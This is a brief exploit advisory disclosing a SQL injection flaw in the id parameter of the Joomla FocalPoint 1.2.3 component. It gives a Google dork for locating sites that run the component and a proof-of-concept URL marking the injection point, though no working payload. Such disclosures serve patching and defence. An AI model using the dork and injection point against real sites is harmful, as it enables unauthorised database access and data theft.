Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability.
419f784ff8442434b7fa865ec9cef0df98b08ae1c02fbf2bd8df38f7db6e6502
# Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection
# Date: 2017-03-23
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_focalpoint
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: WIN
# POC :
id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter
http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers